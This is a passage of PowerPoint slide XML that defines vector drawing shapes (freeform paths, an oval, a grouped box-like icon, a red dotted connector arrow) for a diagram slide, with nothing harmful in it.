                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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72549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06" name="Freeform 854"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2158" y="1323"/>
                  <a:ext cx="419" cy="329"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
                    <a:gd name="T4" fmla="*/ 173 w 254"/>
                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119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72549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07" name="Freeform 855"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2252" y="1304"/>
                  <a:ext cx="109" cy="69"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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08" name="Oval 856"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2239" y="1204"/>
                  <a:ext cx="145" cy="145"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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930" name="Straight Arrow Connector 929"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="915" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6198146" y="1577812"/>
              <a:ext cx="2475710" cy="2960616"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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31" name="Group 1073"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8361261" y="2239767"/>
              <a:ext cx="968375" cy="766763"/>
              <a:chOff x="4393" y="2085"/>
              <a:chExt cx="610" cy="483"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="932" name="Freeform 859"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4393" y="2085"/>
                <a:ext cx="610" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 7139"/>
                  <a:gd name="T1" fmla="*/ 1077 h 1913"/>
                  <a:gd name="T2" fmla="*/ 4018 w 7139"/>
                  <a:gd name="T3" fmla="*/ 0 h 1913"/>
                  <a:gd name="T4" fmla="*/ 7139 w 7139"/>
                  <a:gd name="T5" fmla="*/ 836 h 1913"/>
                  <a:gd name="T6" fmla="*/ 3123 w 7139"/>
                  <a:gd name="T7" fmla="*/ 1913 h 1913"/>
                  <a:gd name="T8" fmla="*/ 0 w 7139"/>
                  <a:gd name="T9" fmla="*/ 1077 h 19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39"/>
                  <a:gd name="T16" fmla="*/ 0 h 1913"/>
                  <a:gd name="T17" fmla="*/ 7139 w 7139"/>
                  <a:gd name="T18" fmla="*/ 1913 h 19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39" h="1913">
                    <a:moveTo>
                      <a:pt x="0" y="1077"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4018" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7139" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="1913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="107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3" name="Freeform 860"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4393" y="2156"/>
                <a:ext cx="343" cy="412"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T1" fmla="*/ 3737 h 4814"/>
                  <a:gd name="T2" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T3" fmla="*/ 0 h 4814"/>
                  <a:gd name="T4" fmla="*/ 0 w 4016"/>
                  <a:gd name="T5" fmla="*/ 1077 h 4814"/>
                  <a:gd name="T6" fmla="*/ 0 w 4016"/>
                  <a:gd name="T7" fmla="*/ 4814 h 4814"/>
                  <a:gd name="T8" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T9" fmla="*/ 3737 h 48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16"/>
                  <a:gd name="T16" fmla="*/ 0 h 4814"/>
                  <a:gd name="T17" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T18" fmla="*/ 4814 h 48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16" h="4814">
                    <a:moveTo>
                      <a:pt x="4016" y="3737"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4016" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1077"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4814"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="373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4" name="Freeform 861"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4736" y="2177"/>
                <a:ext cx="267" cy="391"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T1" fmla="*/ 4573 h 4573"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 836 h 4573"/>
                  <a:gd name="T4" fmla="*/ 0 w 3123"/>
                  <a:gd name="T5" fmla="*/ 0 h 4573"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 3735 h 4573"/>
                  <a:gd name="T8" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T9" fmla="*/ 4573 h 45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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 4573"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 4573 h 45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23" h="4573">
                    <a:moveTo>
                      <a:pt x="3123" y="4573"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="457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2B2B2"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="808080"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="189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5" name="Freeform 862"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4417" y="2367"/>
                <a:ext cx="293" cy="194"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3425"/>
                  <a:gd name="T1" fmla="*/ 2267 h 2267"/>
                  <a:gd name="T2" fmla="*/ 0 w 3425"/>
                  <a:gd name="T3" fmla="*/ 916 h 2267"/>
                  <a:gd name="T4" fmla="*/ 3425 w 3425"/>
                  <a:gd name="T5" fmla="*/ 0 h 2267"/>
                  <a:gd name="T6" fmla="*/ 3425 w 3425"/>
                  <a:gd name="T7" fmla="*/ 1351 h 2267"/>
                  <a:gd name="T8" fmla="*/ 0 w 3425"/>
                  <a:gd name="T9" fmla="*/ 2267 h 22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25"/>
                  <a:gd name="T16" fmla="*/ 0 h 2267"/>
                  <a:gd name="T17" fmla="*/ 3425 w 3425"/>
                  <a:gd name="T18" fmla="*/ 2267 h 226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25" h="2267">
                    <a:moveTo>
                      <a:pt x="0" y="2267"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3425" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3425" y="1351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2267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2"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="folHlink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6" name="Freeform 869"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4622" y="2095"/>
                <a:ext cx="76" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 893"/>
                  <a:gd name="T1" fmla="*/ 120 h 238"/>
                  <a:gd name="T2" fmla="*/ 447 w 893"/>
                  <a:gd name="T3" fmla="*/ 0 h 238"/>
                  <a:gd name="T4" fmla="*/ 893 w 893"/>
                  <a:gd name="T5" fmla="*/ 120 h 238"/>
                  <a:gd name="T6" fmla="*/ 447 w 893"/>
                  <a:gd name="T7" fmla="*/ 238 h 238"/>
                  <a:gd name="T8" fmla="*/ 0 w 893"/>
                  <a:gd name="T9" fmla="*/ 120 h 2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3"/>
                  <a:gd name="T16" fmla="*/ 0 h 238"/>
                  <a:gd name="T17" fmla="*/ 893 w 893"/>
                  <a:gd name="T18" fmla="*/ 238 h 2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3" h="238">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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7" name="Freeform 870"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4622" y="2106"/>
                <a:ext cx="38" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 199 h 199"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 118 h 199"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 0 h 199"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 78 h 199"/>
                  <a:gd name="T8" fmla="*/ 0 w 446"/>
                  <a:gd name="T9" fmla="*/ 199 h 1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6"/>
                  <a:gd name="T16" fmla="*/ 0 h 199"/>
                  <a:gd name="T17" fmla="*/ 446 w 446"/>
                  <a:gd name="T18" fmla="*/ 199 h 1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6" h="199">
                    <a:moveTo>
                      <a:pt x="0" y="199"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19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8" name="Freeform 871"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4660" y="2106"/>
                <a:ext cx="38" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 447"/>
                  <a:gd name="T1" fmla="*/ 0 h 199"/>
                  <a:gd name="T2" fmla="*/ 0 w 447"/>
                  <a:gd name="T3" fmla="*/ 78 h 199"/>
                  <a:gd name="T4" fmla="*/ 447 w 447"/>
                  <a:gd name="T5" fmla="*/ 199 h 199"/>
                  <a:gd name="T6" fmla="*/ 447 w 447"/>
                  <a:gd name="T7" fmla="*/ 118 h 199"/>
                  <a:gd name="T8" fmla="*/ 0 w 447"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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7"/>
                  <a:gd name="T16" fmla="*/ 0 h 199"/>
                  <a:gd name="T17" fmla="*/ 447 w 447"/>
                  <a:gd name="T18" fmla="*/ 199 h 1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7" h="199">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="1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9" name="Freeform 872"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4393" y="2195"/>
                <a:ext cx="343" cy="98"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T1" fmla="*/ 61 h 1139"/>
                  <a:gd name="T2" fmla="*/ 0 w 4016"/>
                  <a:gd name="T3" fmla="*/ 1139 h 1139"/>
                  <a:gd name="T4" fmla="*/ 0 w 4016"/>
                  <a:gd name="T5" fmla="*/ 1080 h 1139"/>
                  <a:gd name="T6" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T7" fmla="*/ 0 h 1139"/>
                  <a:gd name="T8" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T9" fmla="*/ 61 h 1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16"/>
                  <a:gd name="T16" fmla="*/ 0 h 1139"/>
                  <a:gd name="T17" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T18" fmla="*/ 1139 h 11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16" h="1139">
                    <a:moveTo>
                      <a:pt x="4016" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1080"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="6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0" name="Freeform 873"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4736" y="2216"/>
                <a:ext cx="267" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 61 h 898"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 898 h 898"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 839 h 898"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 898"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 61 h 8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23"/>
